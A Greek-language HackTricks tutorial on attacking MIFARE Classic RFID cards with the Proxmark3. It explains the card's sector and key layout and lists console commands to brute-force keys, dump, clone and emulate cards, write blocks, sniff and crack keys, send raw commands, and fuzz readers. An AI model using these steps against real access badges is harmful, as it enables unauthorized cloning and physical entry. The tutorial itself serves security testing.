Proxmark 3

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Red Team AWS του HackTricks)!

Try Hard Security Group


Επίθεση σε Συστήματα RFID με το Proxmark3

Το πρώτο πράγμα που χρειάζεστε είναι ένα Proxmark3 και να εγκαταστήσετε το λογισμικό και τις εξαρτήσεις τουs.

Επίθεση σε MIFARE Classic 1KB

Έχει 16 τομείς, κάθε ένας έχει 4 μπλοκ και κάθε μπλοκ περιέχει 16B. Το UID βρίσκεται στον τομέα 0 μπλοκ 0 (και δεν μπορεί να τροποποιηθεί). Για να έχετε πρόσβαση σε κάθε τομέα χρειάζεστε 2 κλειδιά (Α και Β) τα οποία αποθηκεύονται στο μπλοκ 3 κάθε τομέα (τροχαίος τομέας). Ο τροχαίος τομέας αποθηκεύει επίσης τα bits πρόσβασης που δίνουν τις άδειες ανάγνωσης και εγγραφής σε κάθε μπλοκ χρησιμοποιώντας τα 2 κλειδιά. Τα 2 κλειδιά είναι χρήσιμα για να δώσουν άδειες για ανάγνωση αν γνωρίζετε το πρώτο και για εγγραφή αν γνωρίζετε το δεύτερο (για παράδειγμα).

Μπορούν να πραγματοποιηθούν πολλές επιθέσεις

proxmark3> hf mf #List attacks

proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF

proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key

proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory

proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card

Το Proxmark3 επιτρέπει την εκτέλεση άλλων ενεργειών όπως ακρόαση μιας επικοινωνίας Tag προς Reader για να προσπαθήσετε να βρείτε ευαίσθητα δεδομένα. Σε αυτήν την κάρτα μπορείτε απλώς να καταγράψετε την επικοινωνία και να υπολογίσετε το χρησιμοποιούμενο κλειδί επειδή οι κρυπτογραφικές λειτουργίες που χρησιμοποιούνται είναι αδύναμες και γνωρίζοντας το κείμενο και το κρυπτοκείμενο μπορείτε να το υπολογίσετε (εργαλείο mfkey64).

Ακατέργαστες Εντολές

Συστήματα IoT μερικές φορές χρησιμοποιούν μη επωνυμασμένες ή μη εμπορικές ετικέτες. Σε αυτήν την περίπτωση, μπορείτε να χρησιμοποιήσετε το Proxmark3 για να στείλετε προσαρμοσμένες ακατέργαστες εντολές στις ετικέτες.

proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search

Με αυτές τις πληροφορίες μπορείτε να προσπαθήσετε να αναζητήσετε πληροφορίες σχετικά με την κάρτα και τον τρόπο επικοινωνίας μαζί της. Το Proxmark3 επιτρέπει την αποστολή ωμών εντολών όπως: hf 14a raw -p -b 7 26

Σενάρια

Το λογισμικό Proxmark3 διαθέτει μια προφορτωμένη λίστα σεναρίων αυτοματισμού που μπορείτε να χρησιμοποιήσετε για την εκτέλεση απλών εργασιών. Για να ανακτήσετε την πλήρη λίστα, χρησιμοποιήστε την εντολή script list. Στη συνέχεια, χρησιμοποιήστε την εντολή script run, ακολουθούμενη από το όνομα του σεναρίου:

proxmark3> script run mfkeys

Μπορείτε να δημιουργήσετε ένα σενάριο για fuzzing αναγνωστών ετικετών, έτσι ώστε να αντιγράψετε τα δεδομένα ενός έγκυρου καρτών και να γράψετε ένα Lua script που τυχαιοποιεί έναν ή περισσότερους τυχαίους bytes και ελέγχει αν ο αναγνώστης κρασάρει με οποιαδήποτε επανάληψη.

Try Hard Security Group

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Last updated